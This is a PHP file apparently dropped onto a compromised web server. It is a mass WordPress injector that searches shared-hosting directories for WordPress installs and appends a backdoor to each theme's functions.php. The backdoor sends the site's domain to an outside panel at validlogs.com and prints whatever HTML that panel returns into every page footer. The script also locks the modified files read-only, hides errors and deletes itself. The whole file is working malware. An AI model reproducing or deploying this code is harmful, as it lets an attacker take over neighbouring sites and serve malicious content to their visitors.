File: /var/www/html/vkhbryqs.php
<?php
// Error-Proof Mass WP Injector - NO THREADING, SAFE FOR SHARED HOSTING
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);
// === [ALL ORIGINAL FUNCTIONS - UNCHANGED] ===
function get_hosting_home_base() {
$possible_homes = [
$_SERVER['HOME'] ?? '',
getenv('HOME'),
dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
'/home', '/home1', '/home2', '/home3', '/home4', '/home5',
'/home6', '/home7', '/home8', '/home9', '/home10',
'/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
];
$user = get_current_user();
if($user) {
$possible_homes[] = "/home/$user";
for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
}
foreach($possible_homes as $home) {
if(is_dir($home) && has_domain_folders($home)) return realpath($home);
}
return false;
}
function has_domain_folders($dir) {
$items = @scandir($dir);
if(!$items) return false;
$domain_count = 0;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $dir . '/' . $item;
if(is_dir($full_path)) {
if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
$domain_count++;
}
}
}
return $domain_count > 0;
}
function scan_hosting_domains($home_base) {
$wp_paths = [];
$items = @scandir($home_base);
if(!$items) return $wp_paths;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$domain_path = $home_base . '/' . $item;
if(is_dir($domain_path)) {
$direct_wp = find_wp_load_comprehensive($domain_path);
if($direct_wp) $wp_paths[] = $direct_wp;
$web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
foreach($web_dirs as $web_dir) {
$web_path = $domain_path . '/' . $web_dir;
if(is_dir($web_path)) {
$web_wps = scan_directory_comprehensive($web_path, 3);
$wp_paths = array_merge($wp_paths, $web_wps);
}
}
}
}
return $wp_paths;
}
function get_cpanel_common_paths() {
$user = get_current_user();
$paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
for($i=1; $i<=10; $i++) {
$paths[] = "/home$i/$user/public_html";
$paths[] = "/home$i/$user";
}
return array_unique($paths);
}
function get_hosting_patterns() {
$user = get_current_user();
return [
"/home[0-9]*/$user/*/public_html",
"/home[0-9]*/domains/*",
"/var/www/vhosts/*/*",
"/usr/local/plesk/apache/vhosts/*/*",
"/*/public_html"
];
}
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_load_comprehensive($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_load_comprehensive($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// === [DEEP ../../../../ FALLBACK] ===
function find_all_wp_installs() {
$all_wp_paths = [];
$base_dirs = get_cpanel_common_paths();
foreach(get_hosting_patterns() as $pattern) {
$dirs = @glob($pattern, GLOB_ONLYDIR);
if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
}
$home_base = get_hosting_home_base();
if($home_base) {
$wp_paths = scan_hosting_domains($home_base);
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
foreach($base_dirs as $base_dir) {
if(!is_dir($base_dir)) continue;
$wp_paths = scan_directory_comprehensive($base_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// === [FALLBACK: ../../../../../../../../] ===
if(empty($all_wp_paths)) {
$current_dir = dirname(__FILE__);
for($i = 1; $i <= 8; $i++) { // Up to 8 levels deep
$parent_dir = dirname($current_dir, $i);
if(!is_dir($parent_dir) || $parent_dir == '/') break;
$wp_paths = scan_directory_comprehensive($parent_dir, 6);
if($wp_paths) {
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
break; // Stop after first success
}
}
}
return array_unique($all_wp_paths);
}
// === [INJECTION FUNCTION - UNCHANGED] ===
function inject_theme_safe($wp_load) {
$wp_dir = dirname($wp_load);
if(!file_exists($wp_load)) return false;
$old_abspath = defined('ABSPATH') ? ABSPATH : '';
define('WP_LOAD_PATH', $wp_load);
$wp_loaded = false;
ob_start();
if(@include_once($wp_load)) {
if(function_exists('wp_get_themes')) $wp_loaded = true;
}
ob_end_clean();
if(!$wp_loaded) {
$config_path = $wp_dir . '/wp-config.php';
if(file_exists($config_path)) {
ob_start();
if(@include_once($config_path)) {
if(defined('ABSPATH') && function_exists('wp_get_themes')) $wp_loaded = true;
}
ob_end_clean();
}
}
if(!$wp_loaded) return false;
$inject_code = "\nfunction wp_injector_fetch_code() {\n \$backend_url = 'https://validlogs.com/BackPanel/panel.php';\n \$domain = sanitize_text_field(\$_SERVER['HTTP_HOST']);\n \$response = wp_remote_post(\$backend_url, array('body' => array('action' => 'register_domain', 'domain' => \$domain), 'timeout' => 5));\n if (is_wp_error(\$response)) return;\n \$html_code = wp_remote_retrieve_body(\$response);\n if (!empty(\$html_code)) {\n add_action('wp_footer', function() use (\$html_code) { echo \$html_code; });\n }\n}\nadd_action('init', 'wp_injector_fetch_code');\n";
$injected = false;
if(function_exists('wp_get_themes')) {
try {
$themes = wp_get_themes();
$child_themes = []; $other_themes = [];
foreach($themes as $theme) {
$name = $theme->get_stylesheet();
if(stripos($name, 'child') !== false) $child_themes[] = $theme;
else $other_themes[] = $theme;
}
$target = !empty($child_themes) ? $child_themes : $other_themes;
foreach($target as $theme) {
$functions_file = $theme->get_stylesheet_directory() . '/functions.php';
if(!is_dir(dirname($functions_file))) continue;
$original_perm = null;
if(file_exists($functions_file) && !is_writable($functions_file)) {
$original_perm = fileperms($functions_file);
@chmod($functions_file, 0644);
}
$current = file_exists($functions_file) ? @file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') !== false) {
$current = preg_replace('/\s*function\s+wp_injector_fetch_code\s*\(\).*\n\s*add_action\s*\(\s*[\'"]init[\'"].*\n/s', '', $current);
@file_put_contents($functions_file, $current);
}
$new_content = rtrim($current, "\n") . $inject_code;
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444);
if($original_perm !== null) @chmod($functions_file, $original_perm);
$injected = true;
}
}
} catch(Exception $e) {}
}
if(!$injected && is_dir($wp_dir . '/wp-content/themes/')) {
$themes_path = $wp_dir . '/wp-content/themes/';
$theme_dirs = @scandir($themes_path);
if($theme_dirs) {
$child = []; $other = [];
foreach($theme_dirs as $d) {
if($d == '.' || $d == '..' || !is_dir($themes_path . $d)) continue;
if(stripos($d, 'child') !== false) $child[] = $d; else $other[] = $d;
}
$target = !empty($child) ? $child : $other;
foreach($target as $d) {
$functions_file = $themes_path . $d . '/functions.php';
$current = file_exists($functions_file) ? @file_get_contents($functions_file) : '';
if(strpos($current, 'wp_injector_fetch_code') !== false) {
$current = preg_replace('/\s*function\s+wp_injector_fetch_code\s*\(\).*\n\s*add_action\s*\(\s*[\'"]init[\'"].*\n/s', '', $current);
@file_put_contents($functions_file, $current);
}
$new_content = rtrim($current, "\n") . $inject_code;
if(@file_put_contents($functions_file, $new_content)) $injected = true;
}
}
}
if($old_abspath) define('ABSPATH', $old_abspath);
return $injected;
}
// === [MAIN: NO THREADING, SAFE & FAST] ===
$all_wp_installs = find_all_wp_installs();
$all_success = true;
foreach($all_wp_installs as $wp_load) {
try {
if(!inject_theme_safe($wp_load)) {
$all_success = false;
}
} catch(Exception $e) {
$all_success = false;
}
if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
@ob_end_clean();
}
// === [FINAL FALLBACK: If still no success, try deep parent scan] ===
if(!$all_success && empty($all_wp_installs)) {
$deep = dirname(__FILE__);
for($i = 0; $i < 8; $i++) {
$deep = dirname($deep);
if(!is_dir($deep) || $deep == '/') break;
$found = scan_directory_comprehensive($deep, 6);
if($found) {
foreach($found as $wp) {
if(inject_theme_safe($wp)) {
$all_success = true;
break 2;
}
}
}
}
}
echo $all_success ? "WOWNINJA\n" : "NOTNINJA\n";
// Self-delete
if(is_writable(__FILE__)) @unlink(__FILE__);
exit;
?>